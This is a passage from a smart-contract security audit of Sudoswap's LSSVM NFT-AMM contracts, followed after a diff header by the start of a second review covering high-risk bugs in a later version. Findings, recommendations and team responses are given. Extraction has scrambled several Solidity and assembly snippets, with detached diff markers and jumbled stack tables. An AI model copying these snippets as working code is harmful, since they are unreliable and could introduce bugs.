LSSVMPairEnumerable.sol#L52, LSSVMPairEnu- merable.sol#L73, LSSVMPairEnumerable.sol#L114, LSSVMPairMissingEnumer- able.sol#L37, LSSVMPairMissingEnumerable.sol#L58, LSSVMPairMissingEnu- merable.sol#L82, LSSVMPairMissingEnumerable.sol#L133, LSSVMPairMissin- gEnumerable.sol#L143 26 Description: The abovementioned permalinks and corresponding functions are listed for Sudoswap’s consideration to introduce reentrancy guard modifiers. Currently, there is only one function that uses a reentrancy guard modifier: withdrawAllETH() in LSSVMPairETH.sol#L94. Other functions in the codebase may also require reentrancy guard modifiers. We have only seen reentrancy problems when malicious routers, assetRecip- ients, curves, factory owner or protocolFeeRecipient are involved. Despite normal prohibitions on this occurence, it is better to protect one’s codebase than regret leaving open vulnerabilities available for potential attackers. There are three categories of functions that Sudoswap should consider applying reen- trancy guard modifiers to: functions withdrawing ETH, functions sending ETH, and uses of safeTransferFrom() to external addresses (which will trigger an onERC1155Received() callback to receiving contracts). Examples of functions withdrawing ETH within LSSVM: LSSVMPairFactory.sol#L272 LSSVMPairETH.sol#L104 Instances of functions sending ETH within LSSVM: LSSVMPairETH.sol#L34 LSSVMPairETH.sol#L46 A couple of instances that use safeTransferFrom() to call external addresses, which will trigger an onERC1155Received() callback to receiving contracts: LSSVM- PairFactory.sol#L428 LSSVMRouter.sol#L544 Recommendation: Spearbit recommends Sudoswap to consider adding re- entrancy guards to the abovementioned functions and to the entire codebase where appropriate. Sudoswap: We’ve addressed the specific issues linked above with regards to reentrancy. The checks in _pairTransferERC20From and _takeNFTsFromSender both verify token balance or ownership before and after each transfer which can help ensure that tokens are actually sent to the Pair (or its asset recipient). However, we acknowledge this does not mitigate the entire space of possible issues with future malicious Routers. The gas overhead for adding Reentrancy- Guard can be quite significant when e.g. swapping across multiple pools in one tx, so we have opted to avoid it if possible. Pair owners will need to be aware of which new Routers become approved by the Factory owner (intended to be set to governance controlled timelock during deployment). 27 Spearbit: Acknowledged. 3.5 Gas Optimization +3.5.1 Saving 1 byte off the constructor() code Severity: Gas Optimization Context: LSSVMPairCloner#L21-45, LSSVMPairCloner#L113-147 Description: The dup2 before the return in the code below indicates a possible optimization by rearranging the stack. function cloneETHPair(...) ... { assembly { ... | RETURNDATASIZE // 3d | PUSH1 runtime // 60 runtime | DUP1 // 80 // 60 creation | PUSH1 creation (c) // 3d // 39 | RETURNDATASIZE | CODECOPY ,! ,! ,! [0-2d]: runtime code // 81 | DUP2 [0-2d]: runtime code // f3 | RETURN [0-2d]: runtime code ... } } | 0 (r) | r 0 | r r 0 | c r r 0 | 0 c r r 0 | r 0 | 0 c 0 | 0 | – | – | – | – | – | | | Recommendation: Spearbit recommends Sudoswap to consider replacing the constructor code in cloneETHPair() and cloneERC20Pair() with the following code. Also, Sudoswap should make sure to update any dependencies on the length. // 60 runtime // 3d // 81 // 60 creation // 3d // 39 // f3 | PUSH1 runtime (r) | RETURNDATASIZE | DUP2 | PUSH1 creation (c) | RETURNDATASIZE | CODECOPY | RETURN | r | 0 r | r 0 r | c r 0 r | 0 c r 0 r | 0 r | Sudoswap: Addressed in this branch here. 28 Spearbit: Acknowledged. Please double-check with the changes for the finding "Clones With Malicious extradata Are Also Considered Valid Clones" - espe- cially the amount of bytes checked at the end of isETHPairClone() and is- ERC20PairClone(). +3.5.2 Decode extradata in calldata in one go Severity: Gas Optimization Context: LSSVMPair.sol#L131-133 Description: Spearbit discovered that the functions factory(), bondingCurve() and nft() are called independently but in most use cases all of the data is re- quired. Recommendation: Spearbit recommends Sudoswap to create a function that decodes data to save some gas. We recommend creating a new function that calls calldatasize and _immutableParamsLength only once to decode all pa- rameters. This function will also save jump operations. Sudoswap: Acknowledged, but no change for now. A previous implementa- tion decoding all parameters at once had inconclusive gas savings during gas profiling. Spearbit: Acknowledged. +3.5.3 Transfer last NFT instead of first Severity: Gas Optimization Context: LSSVMPairEnumerable.sol#L23-35, LSSVMPairMissingEnumerable#L28- 40, OpenZeppelin's ERC721Enumerable, OpenZeppelin's EnumerableSet.sol Description: When executing _sendAnyNFTsToRecipient() NFTs are retrieved by taking the first available NFT and then sending it to nftRecipient. In (most) ERC721 implementations as well as in the EnumerableSet implementation, the array that stores the ownership is updated by swapping the last element with the selected element, to be able to shrink the array afterwards. When you always transfer the last NFT instead of the first NFT, swapping isn’t necessary so gas is saved. Code related to LSSVMPairEnumerable.sol: 29 abstract contract LSSVMPairEnumerable is LSSVMPair { function _sendAnyNFTsToRecipient(IERC721 _nft, address nftRecipient, uint256 numNFTs) internal override { ... for (uint256 i = 0; i < numNFTs; i++) { uint256 nftId = IERC721Enumerable(address(_nft)).tokenOfOwnerByIndex(address(this), 0); take the first NFT // _nft.safeTransferFrom(address(this), nftRecipient, nftId); // this calls _beforeTokenTransfer of ERC721Enumerable ,! ,! ,! ,! } } } abstract contract ERC721Enumerable is ERC721, IERC721Enumerable { function _beforeTokenTransfer(address from, address to, uint256 tokenId) internal virtual override { ,! ... _removeTokenFromOwnerEnumeration(from, tokenId); ... } function _removeTokenFromOwnerEnumeration(address from, uint256 tokenId) private { ... uint256 lastTokenIndex = ERC721.balanceOf(from) - 1; uint256 tokenIndex = _ownedTokensIndex[tokenId]; // When the token to delete is the last token, the swap operation is unnecessary ==> we can make use of this if (tokenIndex != lastTokenIndex) { uint256 lastTokenId = _ownedTokens[from][lastTokenIndex]; _ownedTokens[from][tokenIndex] = lastTokenId; // Move the last token to the slot of the to-delete token _ownedTokensIndex[lastTokenId] = tokenIndex; // Update the moved token's index } // This also deletes the contents at the last position of the array delete _ownedTokensIndex[tokenId]; delete _ownedTokens[from][lastTokenIndex]; ,! ,! ,! ,! } } Code related to LSSVMPairMissingEnumerable.sol: 30 abstract contract LSSVMPairMissingEnumerable is LSSVMPair { function _sendAnyNFTsToRecipient(IERC721 _nft, address nftRecipient, uint256 numNFTs) internal override { ,! ... for (uint256 i = 0; i < numNFTs; i++) { uint256 nftId = idSet.at(0); // take the first NFT _nft.safeTransferFrom(address(this), nftRecipient, nftId); idSet.remove(nftId); // finally calls _remove() } } } library EnumerableSet { function _remove(Set storage set, bytes32 value) private returns (bool) { ... uint256 toDeleteIndex = valueIndex - 1; uint256 lastIndex = set._values.length - 1; if (lastIndex != toDeleteIndex) { // ==> we can make use of this bytes32 lastvalue = set._values[lastIndex]; set._values[toDeleteIndex] = lastvalue; // Move the last value to the index where the value to delete is set._indexes[lastvalue] = valueIndex; // Replace lastvalue's index to valueIndex ,! ,! } set._values.pop(); delete set._indexes[value]; ... // Delete the slot where the moved value was stored // Delete the index for the deleted slot } } Recommendation: Spearbit recommends Sudoswap to consider changing the _sendAnyNFTsToRecipient() function as follows; Note: Do consider, if worth the trouble, taking into account the expected aver- age number of NFTs that are exchanged. Note that the dynamics of distributing NFTs do change once you implement this; the mechanism changes from FIFO (first in first out) to LIFO (last in first out). For LSSVMPairEnumerable.sol: 31 function _sendAnyNFTsToRecipient(IERC721 _nft, address nftRecipient, uint256 numNFTs) internal override { ... uint256 lastTokenIndex = _nft.balanceOf(address(this)) - 1; for (uint256 i = 0; i < numNFTs; i++) { uint256 nftId = IERC721Enumerable(address(_nft)).tokenOfOwnerByIndex(address(this), 0); // take the first NFT uint256 nftId = IERC721Enumerable(address(_nft)).tokenOfOwnerByIndex(address(this), lastTokenIndex-- ); // take the last NFT _nft.safeTransferFrom(address(this), nftRecipient, nftId); } ,! + - ,! ,! + ,! ,! } For LSSVMPairMissingEnumerable.sol: function _sendAnyNFTsToRecipient(IERC721 _nft, address nftRecipient, uint256 numNFTs) internal override { ... uint256 lastIndex = idSet.length() - 1; for (uint256 i = 0; i < numNFTs; i++) { uint256 nftId = idSet.at(0); // take the first NFT uint256 nftId = idSet.at(lastIndex-- ); // take the last NFT _nft.safeTransferFrom(address(this), nftRecipient, nftId); idSet.remove(nftId); } ,! + - + } Sudoswap: Partially addressed in this branch here. We tried both recom- mendations for both the Enumerable and MissingEnumerable Pairs. The gas snapshot for our test bench showed gas reductions when transferring the last NFT out first in the MissingEnumerable implementation, so we have followed the recommendation. However, the gas savings in the Enumerable case were inconclusive, so we have not followed the second recommendation. Spearbit: Acknowledged. +3.5.4 Simplify the connection between Pair and Router Severity: Gas Optimization Context: LSSVMPairERC20.sol#L41-78, LSSVMRouter.sol#L574-594, LSSVMRou ter.sol#L754-789, LSSVMPair.sol#L371-379 32 Description: There are two ways to interact between Pair and Router: 1. LSSVMPairERC20.sol calls router.pairTransferERC20From, where the goal is to transfer ERC20 2. _swapNFTsForToken calls pair.cacheAssetRecipientNFTBalance and pa ir.routerSwapNFTsForToken, where the goal is to transfer NFTs Using two different patterns to solve the same problem makes the code more com- plex and larger than necessary. Patterns with cacheAssetRecipientNFTBa lance() are also error prone. abstract contract LSSVMPairERC20 is LSSVMPair { function _validateTokenInput(..., bool isRouter, ...) ... { ... if (isRouter) { LSSVMRouter router = LSSVMRouter(payable(msg.sender)); // Verify ,! if router is allowed require(_factory.routerAllowed(router), "Not router"); ... router.pairTransferERC20From( _token, routerCaller, _assetRecipient, inputAmount, pairVariant() ); ... } ... } } contract LSSVMRouter { function pairTransferERC20From(...) ... { // verify caller is a trusted pair contract require(factory.isPair(msg.sender, variant), "Not pair"); ... // transfer tokens to pair token.safeTransferFrom(from, to, amount); // transfer ERC20 from the original caller } ,! } 33 contract LSSVMRouter { function _swapNFTsForToken(...) ... { ... // Cache current asset recipient balance swapList[i].pair.cacheAssetRecipientNFTBalance(); ... for (uint256 j = 0; j < swapList[i].nftIds.length; j++) { ,! ,! nft.safeTransferFrom(msg.sender,assetRecipient,swapList[i].nftIds[j]); // transfer NFTs from the original caller } ... outputAmount += ,! swapList[i].pair.routerSwapNFTsForToken(tokenRecipient); ... } } abstract contract LSSVMPair is Ownable, ReentrancyGuard { function cacheAssetRecipientNFTBalance() external { require(factory().routerAllowed(LSSVMRouter(payable(msg.sender))),"Not router"); // Verify if router is allowed assetRecipientNFTBalanceAtTransferStart = nft().balanceOf(getAssetRecipient()) + 2; } ,! ,! } Recommendation: Spearbit recommends Sudoswap to let _swapNFTsForTo- ken use the same pattern as LSSVMPairERC20.sol so that cacheAssetRecipi- entNFTBalance() will not be necessary any longer. In addition, the functions routerSwapNFTsForToken() and swapNFTsForToken() can be merged, simplify- ing the code. Sudoswap: Addressed in this branch here. Balances are no longer cached and then used in a separate routerSwap function. Instead, we use the same pattern as ERC20 tokens, with the router pulling from the user, with the same check that it can only come from LSSVMPair. LSSVMPair now checks NFT ownership before and after each transfer to guard against potentially malicious routers. Spearbit: Acknowledged. +3.5.5 Cache array length Severity: Gas Optimization Context: LSSVM Contracts, LSSVMPairEnumerable.sol, LSSVMPairFactory.sol, 34 LSSVMPairMissingEnumerable.sol, LSSVMRouter.sol Specifically, the following lines in the corresponding contracts: LLSVMPairEnumerable.sol: LSSVMPairEnumerable.sol#L51, LSSVMPairEnumera ble.sol#L72, LSSVMPairEnumerable.sol#L113 LSSVMPairFactory.sol: LSSVMPairFactory.sol#L378, LSSVMPairFactory.sol #L409, LSSVMPairFactory.sol#L427 LSSVMPairMissingEnumerable.sol: LSSVMPairMissingEnumerable.sol#L57, LS SVMPairMissingEnumerable.sol#L81, LSSVMPairMissingEnumerable.sol#L132, LSSVMPairMissingEnumerable.sol#L142 LSSVMRouter.sol: LSSVMRouter.sol#L358, LSSVMRouter.sol#L405, LSSVMRoute r.sol#L448, LSSVMRouter.sol#L491, LSSVMRouter.sol#L524, LSSVMRouter.so l#L543, LSSVMRouter.sol#L625, LSSVMRouter.sol#L662, LSSVMRouter.sol#L7 00, LSSVMRouter.sol#L772 Description: An array length is frequently used in for loops. This value is an evaluation for every iteration of the loop. Assuming the arrays are regularly larger than 1, it saves some gas to store the array length in a temporary variable. The following snippets are samples of the above context for lines of code where this is relevant: LSSVMPairEnumerable.sol#L51 LSSVMPairFactory.sol#L378 LSSVMPairMissingEnumerable.sol#L57 LSSVMRouter.sol#L358 For more examples, please see the context above for exact lines where this applies. The following contains examples of the overusage of nftIds.length: 35 function swapTokenForSpecificNFTs(...) ... { ... require((nftIds.length > 0) && (nftIds.length <= _nft.balanceOf(address(this))),"Must ask for > 0 and < balanceOf NFTs"); ... (error, newSpotPrice, inputAmount, protocolFee) = _bondingCurve ,! .getBuyInfo( spotPrice, delta, nftIds.length, fee, _factory.protocolFeeMultiplier() ); ... } Recommendation: Spearbit recommends Sudoswap to store array lengths in a temporary variable, especially with for loops. Sudoswap: Acknowledged, but no change for now. Spearbit: Acknowledged. +3.5.6 Use Custom Errors Severity: Gas Optimization Context: LSSVM\Contracts, specifically the following contracts: LSSVMPair.sol, LSSVMPairERC20.sol, LSSVMPairETH.sol, LSSVMPairFactory.sol LSSVMRouter. sol. Specific locations within each contract: LSSVMPair.sol: LSSVMPair.sol#L79, LSSVMPair.sol#L86, LSSVMPair.sol#L91, LSSVMPair.sol#L92-95, LSSVMPair.sol#L99, LSSVMPair.sol#L100-103, LSSVMP air.sol#L138-141, LSSVMPair.sol#L142-145, LSSVMPair.sol#L161, LSSVMPai r.sol#L205-208, LSSVMPair.sol#L209-213, LSSVMPair.sol#L229, LSSVMPair. sol#L271-274, LSSVMPair.sol#L290, LSSVMPair.sol#L298-301, LSSVMPair.so l#L354, LSSVMPair.sol#L372-375, LSSVMPair.sol#L632-635, LSSVMPair.sol# L646-649, LSSVMPair.sol#L662, LSSVMPair.sol#L663, LSSVMPair.sol#L677, LS SVMPair.sol#L692, LSSVMPair.sol#L694 LSSVMPairERC20.sol: LSSVMPairERC20.sol#L47, LSSVMPairERC20.sol#L55, LS SVMPairERC20.sol#L69-73 36 LSSVMPairETH.sol: LSSVMPairETH.sol#L29 LSSVMPairFactory.sol: LSSVMPairFactory.sol#L51-54, LSSVMPairFactory.s ol#L57-60, LSSVMPairFactory.sol#L63-66, LSSVMPairFactory.sol#L69-72, LS SVMPairFactory.sol#L75, LSSVMPairFactory.sol#L78, LSSVMPairFactory.sol #L111-114, LSSVMPairFactory.sol#L179-182, LSSVMPairFactory.sol#L295, LS SVMPairFactory.sol#L307, LSSVMPairFactory.sol#L335, LSSVMPairFactory.s ol#L350, LSSVMPairFactory.sol#L353 LSSVMRouter.sol: LSSVMRouter.sol#L582, LSSVMRouter.sol#L585-590, LSSVMR outer.sol#L604, LSSVMRouter.sol#L788 Description: Strings are used to encode error messages. With the current Solidity versions it is possible to replace them with custom errors, which are more gas efficient. Example of non-custom errors used in LSSVM : LSSVMRouter.sol#L604 require(block.timestamp <= deadline, "Deadline passed"); LSSVMRouter.sol#L788 require(outputAmount >= minOutput, "outputAmount too low"); Note: This pattern has been used in Ownable.sol#L6-L7 Recommendation: Spearbit recommends Sudoswap to use custom error mes- sages. Custom error message usage is explained here on the Solidity Lan- guage Blog. Sudoswap: Acknowledged, but no change for now. Because Pairs are minimal proxies, the gas savings from not having to deploy strings is less of a consider- ation as the implementation is only deployed once. Spearbit: Acknowledged. +3.5.7 Alternatives for the immutable Proxy variables Severity: Gas Optimization Context: LSSVMPairCloner.sol#L113-137 Description: In the current LSSVMPairClone, the immutable variables stored in the proxy are sent along with every call. It may be possible to optimize this. 37 Recommendation: Spearbit recommends Sudoswap two different approaches to this optimization. The first is that Sudoswap store extra data in the contract code, accessing the extra data by using extcodecopy in the Pair contracts. It simplifies the proxy code a little, and arguably the Pair code as well. Spearbit completed a potential implementation of this recommendation as fol- lows: Source snippet for proxy creation: bytes memory ptr = abi.encodePacked(, implementation, ,factory, bondingCurve, nft, poolType, token); ,! assembly { instance := create(0, ptr, ...) ... } Source snippet to retrieve (immutable) values from the proxy code: function getFactory() internal view returns (address factory) { assembly { // Copies to "scratch space" 0 memory pointer extcodecopy(address(), 0, 0x28, 0x14) factory:= shr(0x60, mload(0)) } } If this is not preferable for Sudoswap, our second recommendation is to improve the readability of the code by using Solidity only. However, this approach will cost some more gas. To implement this alternative, follow these steps: 1. Store the extra data as an immutable variable in the proxy. 2. Create a getter function extraData(). Because the address will always be hot when being called by the Pair, the call should cost only about 150 gas. 3. The proxy code can then be almost entirely in Solidity and the Pair will not require the use any low-level calls. Sudoswap: Acknowledged, but no changes at this time. We previously used the extcodecopy method, and the current method of accessing the immutable variables appears to be cheaper, gas-wise. Spearbit: Acknowledged. 38 3.6 Informational +3.6.1 Pair implementations may not be Proxies Severity: Informational Context: LSSVMRouter.sol#L574-594, LSSVMPairFactory.sol#L223-257, LSSV MPairCloner.sol#L206-267 Description: The security of function pairTransferERC20From() relies on is- Pair(). In turn, isPair() relies on both isETHPairClone() and isERC20PairClone(). These functions check that a valid proxy is used with a valid implementation ad- dress. However, if the implementation address itself is a proxy it could link to any other contract. In this case security could be undermined depending on the implementation details. This is not how the protocol is designed, but future developers or developers using a fork of the code might not be aware of this. Recommendation: Spearbit recommends Sudoswap to make sure no proxies are used for the Pair implementation. This is a control that should be present at the deployment process (e.g. is outside of Solidity). Sudoswap: Acknowledged, no external facing changes made. As mentioned above, our protocol does not use proxies for the implementation so no action is taken at this time. Spearbit: Acknowledged. +3.6.2 NFT and Token Pools can be signed orders instead Severity: Informational Context: LSSVMPair.sol Description: Currently if any actor wants to create a buy/sell order they would have to create a new pool and pay gas for it. However, the advantage of this is unclear. TOKEN and NFT type pools can really be buy/sell orders at a price curve using signed data. This is reminiscent of how similar limit orders implemented by OpenSea, 1Inch, and SushiSwap currently function. Amending this in the codebase would make creating buy/sell orders free and should attract more liquidity and/or orders to Sudoswap. Recommendation: Spearbit recommends Sudoswap to consider the addition of a single OrderBook contract that only the taker has to call and provide the maker’s signed order to fulfill an order. 39 Sudoswap: Acknowledged. The signature based model is well-served by e.g. 0x Protocol, Wyvern, and others with off-chain matching and on-chain settle- ment. The intent here behind having on-chain pools is precisely the benefits of being on-chain, e.g easier management by DAOs and other smart contract actors which would need to make a tx anyway to work with a signature-based order book anyway allowing projects to lock in buy-side liquidity in a trustless manner similar to how LP for normal AMM pools can be locked decentralized order book by design--anyone can query pools and build front-ends for swap- ping without relying on centralized off-chain API. Also to note: separately from this AMM protocol, Sudoswap already has an off-chain order book leveraging 0x Protocol v2 for limit buys/sells. Spearbit: Acknowledged. +3.6.3 Remove Code Duplication Severity: Informational Context: LSSVMPair.sol#L125, LSSVMPair.sol#L192 Description: Functions like swapTokenForAnyNFTs and swapTokenForSpeci- ficNFTs are nearly identical and can be deduplicated by creating a common internal function. On the other hand this will slightly increase gas usage due to an extra jump. Recommendation: Spearbit recommends Sudoswap to considering the trade- off between code hygiene and minute gas savings. Our opinion is that the minor gas savings are not worth it in this case and the code should be deduplicated. Sudoswap: Acknowledged, but no change at this time. Spearbit: Acknowledged. +3.6.4 Unclear Function Name Severity: Informational Context: LSSVMPairETH.sol#L23-36, LSSVMPairERC20.sol#L41-78 Description: The functions _validateTokenInput() of both LSSVMPairETH and LSSVMPairERC20 do not only validate the token input but also transfer ETH/ERC20. The function name does not reasonably imply this and therefore can create some confusion. 40 abstract contract LSSVMPairETH is LSSVMPair { function _validateTokenInput(...) ... { ... _assetRecipient.safeTransferETH(inputAmount); ... } } abstract contract LSSVMPairERC20 is LSSVMPair { function _validateTokenInput(...) ... { ... if (isRouter) { ... router.pairTransferERC20From(...); // transfer of tokens ... } else { // Transfer tokens directly _token.safeTransferFrom(msg.sender, _assetRecipient, inputAmount); } } } Recommendation: Spearbit recommends Sudoswap to consider renaming the function _validateTokenInput() to _validateAndTransferTokenInput(). Sudoswap: Changed in response to this issue. _validateTokenInput is now called _pullTokenInputAndPayProtocolFee. Spearbit: Acknowledged. +3.6.5 Inaccurate Message About MAX_FEE Severity: Informational Context: LSSVMPair.sol Description: The function initialize() of LSSVMPair has an error message containing less than 100%. This is likely an error and should probably be less than 90%, as in the changeFee() function and because MAX_FEE == 90%. 41 // 90%, must <= 1 - MAX_PROTOCOL_FEE (set in LSSVMPairFactory) uint256 internal constant MAX_FEE = 9e17; function initialize(..., uint256 _fee, ...) external payable { ... require(_fee < MAX_FEE, "Trade fee must be less than 100%"); // 100% should be 90% ... ,! } function changeFee(uint256 newFee) external onlyOwner { ... require(newFee < MAX_FEE, "Trade fee must be less than 90%"); ... } Recommendation: Spearbit recommends Sudoswap to change the 100% to 90%. Sudoswap: Addressed in branch here. Spearbit: Acknowledged. +3.6.6 Inaccurate comment for assetRecipientNFTBalanceAtTransferStart Severity: Informational Context: LSSVMPair.sol#L27-29, LSSVMPair.sol#L318-337 Description: The comment in LSSVMPair notes that assetRecipientNFTBal- anceAtTransferStart is 0; however, in routerSwapNFTsForToken() the variable assetRecipientNFTBalanceAtTransferStart is set to 1. As such, the below comment is probably inaccurate. // Temporarily used during LSSVMRouter::_swapNFTsForToken to store the number of NFTs transferred ,! // directly to the pair. Should be 0 outside of the execution of routerSwapAnyNFTsForToken. ,! uint256 internal `assetRecipientNFTBalanceAtTransferStart`; function routerSwapNFTsForToken(address payable tokenRecipient) ... { ... assetRecipientNFTBalanceAtTransferStart = 1; ... } 42 Recommendation: Spearbit recommends Sudoswap to re-evaluate the accu- racy of this comment. Sudoswap: The comment is indeed incorrect. Addressed in the change to the GitHub Issue here (We no longer use the cache flow). Spearbit: Acknowledged. +3.6.7 IERC1155 not utilized Severity: Informational Context: LSSVMPair.sol#L5, LSSVMRouter.sol#L35-38 Description: The contract LSSVMPair references IERC1155, but does not utilitze the interface within LSSVMPair.sol. import {IERC1155} from "@openzeppelin/contracts/token/ERC1155/IERC1155.sol"; The struct TokenToTokenTrade is defined in LSSVMRouter, but the contract does not utilize the interface either. struct TokenToTokenTrade { PairSwapSpecific[] tokenToNFTTrades; PairSwapSpecific[] nftToTokenTrades; } It is better to remove unused code due to potential confusion. Recommendation: Spearbit recommends Sudoswap to remove the import of IERC1155 from LSSVMPair.sol and remove the struct TokenToTokenTrade from LSSVMRouter.sol. Sudoswap: Addressed in branch here. Unused import and struct are removed. Spearbit: Acknowledged. +3.6.8 Use Fractions Severity: Informational Context: LSSVMPairFactory.sol#L28, LSSVMPair.sol#L25 Description: In some occasions percentages are indicated in a number format ending in e17. It is also possible to use fractions of e18. Considering e18 is the standard base format, using fractions might be easier to read. 43 LSSVMPairFactory.sol#L28 LSSVMPair.sol#L25 Recommendation: Spearbit recommends Sudoswap to update LSSVMPairFac- tory.sol#L28 for better readability with fractions: - + uint256 internal constant MAX_PROTOCOL_FEE = 1e17; uint256 internal constant MAX_PROTOCOL_FEE = 0.10e18; // 10% In addition, Sudoswap should update LSSVMPair.sol#L25 to include better read- ibility with fractions, according to the diff below: - + uint256 internal constant MAX_FEE = 9e17; uint256 internal constant MAX_FEE = 0.90e18; // 90% Sudoswap: Addressed in branch here. Spearbit: Acknowledged. +3.6.9 Two families of token libraries used Severity: Informational Context: LSSVMPairFactory.sol#L4-10 Description: The Sudoswap contract imports token libraries from both Open- Zeppelin and Solmate. If Sudoswap sticks within one library family, then it will not be necessary to track potential issues from two separate families of libraries. Recommendation: Spearbit recommends Sudoswap to consider choosing ei- ther the Solmate or the OpenZeppelin family of libraries. If there is a specific reason to use multiple libraries, add a comment in the contracts why multiple libraries are used. Sudoswap: We use the solmate library for easier integration with their safe- TransferLib which saves on some gas. Dev comment explaining this has been added in this commit here. Spearbit: Acknowledged. 44 diff --git a/findings_newupdate/spearbit/SudoswapLSSVM2-Spearbit-Security-Review.txt b/findings_newupdate/spearbit/SudoswapLSSVM2-Spearbit-Security-Review.txt new file mode 100644 index 0000000..199063c --- /dev/null +++ b/findings_newupdate/spearbit/SudoswapLSSVM2-Spearbit-Security-Review.txt @@ -0,0 +1,114 @@ +5.1.1 Partial fills for buy orders in ERC1155 swaps will fail when pair has insufficient balance Severity: High Risk Context: VeryFastRouter.sol#L189-L198 Description: Partial fills are currently supported for buy orders in VeryFastRouter.swap(). When _findMaxFil- lableAmtForBuy() determines numItemsToFill, it is not guaranteed that the underlying pair has so many items left to fill. While ERC721 swap handles the scenario where pair balance is less than numItemsToFill in the logic of _findAvailableIds() (maxIdsNeeded vs numIdsFound), ERC1155 swap is missing a similar check and reduction of item numbers when required. Partial fills for buy orders in ERC1155 swaps will fail when the pair has a balance less than numItemsToFill as determined by _findMaxFillableAmtForBuy(). Partial filling, a key feature of VeryFastRouter, will then not work as expected and would lead to an early revert which defeats the purpose of swap(). Recommendation: Check for numItemsToFill against pair balance and use the smaller of the two for partial filling, i.e. calculate min(numItemsToFill, erc1155.balanceOf(pair)) as the amount of NFTs to transfer. Sudorandom Labs: This has been fixed after the review started as part of PR#26. Spearbit: Verified that this is fixed by PR#26. +5.1.2 Function token() of cloneERC1155ERC20Pair() reads from wrong location Severity: High Risk Context: LSSVMPairERC20.sol#L26-L31, LSSVMPairCloner.sol#L359-L436 Description: The function token() loads the token data from position 81. However on ERC1155 pairs it should load it from position 93. Currently, it doesn't retrieve the right values and the code won't function correctly. LSSVMPair.sol: LSSVMPair.sol: 20))) ,! LSSVMPair.sol: 40))) ,! LSSVMPair.sol: 60))) _factory _bondingCurve := shr(0x60, calldataload(sub(calldatasize(), paramsLength))) := shr(0x60, calldataload(add(sub(calldatasize(), paramsLength), _nft := shr(0x60, calldataload(add(sub(calldatasize(), paramsLength), _poolType := shr(0xf8, calldataload(add(sub(calldatasize(), paramsLength), ,! LSSVMPairERC1155.sol: id LSSVMPairERC721.sol: _propertyChecker := shr(0x60, calldataload(add(sub(calldatasize(), paramsLength), := calldataload(add(sub(calldatasize(), paramsLength), 61)) 61))) ,! LSSVMPairERC20.sol: ,! 81))) _token := shr(0x60, calldataload(add(sub(calldatasize(), paramsLength), function cloneERC1155ERC20Pair(... ) ... { assembly { ... mstore(add(ptr, 0x3e), shl(0x60, factory)) - 20 bytes mstore(add(ptr, 0x52), shl(0x60, bondingCurve)) // position 20 - 20 bytes // position 40 - 20 bytes mstore(add(ptr, 0x66), shl(0x60, nft)) // position 60 - 1 bytes mstore8(add(ptr, 0x7a), poolType) // position 61 - 32 bytes mstore(add(ptr, 0x7b), nftId) mstore(add(ptr, 0x9b), shl(0x60, token)) // position 93 - 20 bytes ... // position 0 } } 6 Recommendation: After the review has started, the function token() has been updated to read the last 20 bytes. See PR#21. Sudorandom Labs: Solved in PR#21. Spearbit: Verified that this is fixed by PR#21. +5.1.3 Switched order of update leads to incorrect partial fill calculations Severity: High Risk Context: VeryFastRouter.sol#L260-L264 Description: In the binary search, the order of updation of start and numItemsToFill is switched with start being updated before numItemsToFill which itself uses the value of start: start = (start + end)/2 + 1; numItemsToFill = (start + end)/2; This leads to incorrect partial fill calculations when binary search recurses on the right half. Recommendation: This was found by the project team after the start of the review and fixed (by switching the order of updations) in PR#27. Sudorandom Labs: Solved in PR#27. Spearbit: Verified that this is fixed by PR#27. +5.1.4 Swap functions with sell orders in LSSVMRouter will fail for property-check enforced pairs Severity: High Risk Context: LSSVMRouter.sol, VeryFastRouter.sol#L36-L37, VeryFastRouter.sol#L118-L140 Description: Swap functions with sell orders in LSSVMRouter will revert for property-check enforced pairs. While VeryFastRouter swap function supports sell orders to specify property check parameters for pairs enforcing them, none of the swap functions in LSSVMRouter support the same. Recommendation: Deprecate LSSVMRouter or add support to it for feature-parity with VeryFastRouter. Sudorandom Labs: The VeryFastRouter is intended to be a router rewrite that addresses many of the concerns with the LSSVMRouter. The LSSVMRouter has been modified very little from the audit in v1, with most of the new features (e.g. property check support, multiple token output support, buying with ETH and ERC20, and partial fill) being all moved to the new router. Acknowledged, as mentioned above, property checking is supported in the new VeryFastRouter. LSSVMRouter will be deprecated once full test coverage for VeryFastRouter is achieved. Spearbit: Acknowledged. +5.1.5 pairTransferERC20From() only supports ERC721 NFTs Severity: High Risk Context: LSSVMRouter.sol#L491-L543, VeryFastRouter.sol#L344-L407 Description: Function pairTransferERC20From() which is is present in both LSSVMRouter and VeryFastRouter, only checks for ERC721_ERC20. This means ERC1155 NFTs are not supported by the routers. The following code is present in both LSSVMRouter and VeryFastRouter. function pairTransferERC20From(...) ... { require(factory.isPair(msg.sender, variant), "Not pair"); ... require(variant == ILSSVMPairFactoryLike.PairVariant.ERC721_ERC20, "Not ERC20 pair"); ... } 7 Recommendation: After the start of this review, the function pairTransferERC20From() has already been up- dated in PR#21. Also see issue: "Use of isPair() is not intuitive" Sudorandom Labs: Solved in PR#21 and PR#30. Spearbit: Verified that this is fixed by PR#21 and PR#30. +5.1.6 Insufficient application of trading fee leads to 50% loss for LPs in swapTokenForAnyNFTs() Severity: High Risk Context: LSSVMPairERC1155.sol#L114, LSSVMPairERC1155.sol#L61-L63, LSSVMPairERC721.sol#L51-L59 Description: The protocol applies a trading fee of 2*tradeFee on NFT buys from pairs (to compensate for 0 fees on NFT sells as noted in the comment: "// We pull twice the trade fee on buys but don't take trade fee on sells if assetRecipient is set"). this While ERC1155.swapTokenForSpecificNFTs(), trading fee of only tradeFee (instead of 2*tradeFee). enforced in is LSSVMPairERC721.swapTokenForSpecificNFTs() LSSVMPairERC1155.swapTokenForAnyNFTs() and LSSVMPair- a enforces Affected LPs of pairs targeted by LSSVMPairERC1155. swapTokenForAnyNFTs() will unexpectedly lose 50% of the trade fees. Recommendation: This entire function LSSVMPairERC1155. swapTokenForAnyNFTs() has been removed in a recent PR#22 (after the start of this review). So there is nothing to fix related to this issue. Sudorandom Labs: Acknowledged, as function has been removed, this should no longer be a concern. Spearbit: Verified that this is fixed by PR#22. +5.1.7 Royalty not always being taken into account leads to incorrect protocol accounting Severity: High Risk Context: StandardSettings.sol#L227-L294, VeryFastRouter.sol#L78-L95 LSSVMPair.sol#L225-L474, LSSVMRouter.sol#L281-L315, LSSVMPairERC1155.sol#L136-L184, Description: The function getSellNFTQuoteWithRoyalties() is similar to getSellNFTQuote(), except that it also takes the royalties into account. When the function robustSwapNFTsForToken() of the LSSVMRouter is called, it first calls getSellNFTQuote() and checks that a sufficient amount of tokens 